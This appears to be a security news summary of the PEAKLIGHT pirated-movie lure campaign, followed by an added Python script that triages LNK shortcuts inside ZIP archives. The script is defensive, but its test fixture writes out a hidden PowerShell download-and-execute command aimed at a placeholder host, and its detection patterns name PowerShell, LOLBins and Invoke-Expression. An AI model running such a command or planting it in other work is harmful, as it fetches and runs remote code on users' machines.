Windows systems have been targeted in attacks that use pirated-movie lures to deploy the novel PEAKLIGHT malware dropper, which in turn delivers several malware-as-a-service payloads, The Hacker News reports.
Attacks begin with the download of a malicious ZIP file posing as a pirated movie. The archive contains an LNK file that connects to a content delivery network hosting a memory-only JavaScript dropper, which in turn executes PEAKLIGHT, according to an analysis from Mandiant. Researchers added that PEAKLIGHT then retrieves Hijack Loader (also known as SHADOWLADDER, IDAT Loader, and DOILoader), CryptBot, and Lumma Stealer. "PEAKLIGHT is an obfuscated PowerShell-based downloader that is part of a multi-stage execution chain that checks for the presence of ZIP archives in hard-coded file paths. If the archives do not exist, the downloader will reach out to a CDN site and download the remotely hosted archive file and save it to disk," said researchers.
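The first link in the chain described above is an LNK file inside a ZIP that masquerades as a movie. The following triage script is an added example written for this page; it is not code from Mandiant or from the article. It opens an archive, finds every .lnk entry, reads the shortcut's target, working directory and command-line arguments using the public MS-SHLLINK layout, and flags shortcuts that invoke PowerShell, hide their window, carry a URL or pipe downloaded content into Invoke-Expression. The sample archive, the "Full.Movie.2024.1080p.mp4.lnk" name and the cdn.example.invalid hostname are constructed fixtures, not indicators from the campaign. One caveat for real samples: many lures store the target in the LinkTargetIDList rather than in RelativePath; this parser skips over that structure instead of decoding it, so the indicator checks should also be applied to the arguments, which is what happens here.

```python
import io
import re
import struct
import zipfile

# LinkFlags bits from the ShellLinkHeader (MS-SHLLINK section 2.1.1).
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-000000000046}

# Things a shortcut that claims to open a movie has no business doing.
INDICATORS = {
    "powershell":    r"\b(powershell|pwsh)\b",
    "lolbin":        r"\b(mshta|wscript|cscript|certutil|bitsadmin|curl|rundll32|regsvr32)\b",
    "cmd_c":         r"\bcmd(\.exe)?\s+/[ck]\b",
    "hidden_window": r"(-w(indowstyle)?\s+hidden|-w\s+1\b)",
    "exec_bypass":   r"-e(p|xecutionpolicy)\s+bypass",
    "encoded":       r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}",
    "url":           r"https?://",
    "web_request":   r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|wget)\b",
    "iex":           r"\b(iex|invoke-expression)\b",
}
INDICATORS = {k: re.compile(v, re.IGNORECASE) for k, v in INDICATORS.items()}


def parse_lnk(data: bytes) -> dict:
    """Minimal MS-SHLLINK reader: validate header, skip IDList/LinkInfo, decode StringData."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link (bad HeaderSize/CLSID)")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (u16) followed by the ItemIDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize (u32) counts itself
        off += struct.unpack_from("<I", data, off)[0]
    out = {"flags": flags}
    for bit, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                     (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                     (HAS_ICON_LOCATION, "icon_location")):
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]   # CountCharacters, no terminator
        off += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[off:off + count * width]
        if len(raw) != count * width:
            raise ValueError(f"truncated {key}")
        off += count * width
        out[key] = raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")
    return out


def triage_zip(zip_bytes: bytes) -> list:
    """Return one verdict per .lnk entry in the archive."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".lnk"):
                continue
            try:
                lnk = parse_lnk(zf.read(info))
            except (ValueError, struct.error) as exc:
                findings.append({"entry": info.filename, "verdict": "malformed", "error": str(exc)})
                continue
            cmdline = " ".join(lnk.get(k, "") for k in ("relative_path", "working_dir", "arguments"))
            hits = sorted(name for name, rx in INDICATORS.items() if rx.search(cmdline))
            double_ext = re.search(r"\.(mp4|mkv|avi|mov|wmv)\.lnk$", info.filename, re.I) is not None
            findings.append({
                "entry": info.filename,
                "target": lnk.get("relative_path", ""),
                "arguments": lnk.get("arguments", ""),
                "indicators": hits,
                "double_extension": double_ext,
                "verdict": "suspicious" if hits or double_ext else "clean",
            })
    return findings


def build_lnk(relative_path: str, arguments: str = "", working_dir: str = "") -> bytes:
    """Constructed test fixture: a Unicode shell link carrying only StringData sections."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH
    flags |= HAS_WORKING_DIR if working_dir else 0
    flags |= HAS_ARGUMENTS if arguments else 0
    header = (struct.pack("<I", 0x4C) + LNK_CLSID
              + struct.pack("<II", flags, 0x20)      # LinkFlags, FILE_ATTRIBUTE_ARCHIVE
              + b"\x00" * 24                          # Creation/Access/WriteTime
              + struct.pack("<III", 0, 0, 7)          # FileSize, IconIndex, SW_SHOWMINNOACTIVE
              + b"\x00" * 12)                         # HotKey + Reserved1..3
    body = b""
    for s in (relative_path, working_dir, arguments):  # StringData order per the spec
        if s:
            body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body


def build_sample_zip() -> bytes:
    """Constructed lure archive; the hostname is a placeholder, not a real indicator."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("readme.txt", "Enjoy the movie!\n")
        zf.writestr("Full.Movie.2024.1080p.mp4.lnk", build_lnk(
            r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
            r'-w hidden -ep bypass -c "iwr https://cdn.example.invalid/loader.js | iex"'))
        zf.writestr("Notes.lnk", build_lnk(r"..\notes.txt"))          # benign shortcut
        zf.writestr("Broken.lnk", build_lnk("x", "abc")[:-2])          # truncated StringData
    return buf.getvalue()


if __name__ == "__main__":
    for finding in triage_zip(build_sample_zip()):
        print(finding)
```

To run it against a real download, call `triage_zip(open(path, "rb").read())`; anything with a double extension or a non-empty indicator list deserves a detonation or a closer look at the LNK with a full parser before anyone double-clicks it.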